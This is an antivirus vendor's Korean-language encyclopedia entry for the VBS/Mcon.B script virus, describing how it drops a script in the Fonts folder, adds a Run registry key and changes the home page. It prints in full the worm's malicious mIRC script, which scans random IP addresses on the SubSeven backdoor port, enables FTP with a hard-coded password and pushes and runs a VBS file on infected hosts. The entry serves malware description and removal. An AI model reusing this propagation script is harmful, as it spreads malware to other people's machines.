이름

VBS/Mcon.B

바이러스 종류

Script Virus

실행환경

windows

증상요약

null

위험등급

null

확산방법

null

치료방법

터보백신 제품군으로 치료가능  

※ 상세 설명

이 바이러스를 실행하면 윈도우 폴더의 "Font" 폴더에 ttfloads.vbs를 생성 하고 wscript.exe 로 ttfloads.vbs 를 실행한다. 부팅시 실행되도로 레지스트리를 아래와 같이 바꾼다. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\ttflo ad, "wscript.exe " & wscript.scriptfullname 시작 홈페이지를 "http://www.zonelabs.com/" 로 바꾼다. 영문 윈도우에서는 레지스트리에서 동작이 되지않아도 startup 에도 ttfloads.vbs 가 생성되어 부팅이 끝난 후에 동작한다. mirc 가 설치되어 있으면 script.ini 를 아래와 같이 바꾼다. [script] n0=var %ss.ip n1=alias ss.close { if ($sock(s7scan)) { sockclose s7scan | .timerTO1 off | .timerTO3 off | genIp } } n2=alias subScan { if ($1 == $null) { return } | %ss.ip = $1 | var % ss.port = 27374 | if ($2 != $null) { %ss.port = $2 } | sockclose s7scan | sockopen s7scan %ss.ip %ss.port | .timerTO1 -c 0 30 ss.close } n3=on 1:sockclose:s7scan:{ ss.close } n4=on 1:sockread:s7scan:{ if ($sockerr > 0) { return } | .timerTO1 off | %tmp = null | sockread -f %tmp | if (connected isincs %tmp) { sockwrite -t s7scan FTPenable!subhunt@@@21:::1$$$c:\ } | elseif (PWD isincs %tmp) { sockwrite -t s7scan PWD14438136782715101980 } | elseif (server enabled isincs %tmp) { run -n "&w&"\fonts\sndvol.vbs"&" % ss.ip | .timerTO3 0 90 sockwrite -t s7scan FTPdisable } | elseif (server disable isincs %tmp) { sockwrite -t s7scan FMXc:\sndload.vbs | .timerTO3 off } | elseif (executed isincs %tmp) { ss.close s7scan } | .timerTO1 0 30 ss.close | return } n5=alias genIp { var %ch,%a,%b,%c,%d | set %ch $rand(1,100) | if (%ch <= 25) { %a = 24 | %b = $rand(0,254) } | elseif ((%ch > 25) && (%ch <= 33)) { %a = 172 | %b = 128 } | elseif ((%ch > 33) && (%ch <= 41)) { %a = 152 | %b = $rand(163,175) } | elseif ((%ch > 41) && (%ch <= 49)) { %a = 205 | %b = 163 } | elseif ((%ch > 49) && (%ch <= 57)) { % a = 4 | %b = $rand(30,45) } | elseif ((%ch > 57) && (%ch <= 65)) { % a = 151 | %b = $rand(196,206) } | elseif ((%ch > 65) && (%ch <= 73)) { %a = 63 | %b = $rand(194,207) } | elseif ((%ch > 73) && (%ch <= 81)) { %a = 216 | %b = $rand(76,79) } | else { %a = $rand(3,243) | % b = $rand(0,254) } | %c = $rand(0,254) | %d = $rand(1,254) | subScan % a $+ . $+ %b $+ . $+ %c $+ . $+ %d | return } n6=on 1:start:{ genip }

※ 예방 및 수동 조치 방법

• 본 컨텐츠에 대한 저작권은 '에브리존'에게 있으며 이에 무단 사용 및 재배포를 금지합니다.
• 본 컨텐츠에 대한 이용 문의는 '에브리존'으로 문의하여 주십시요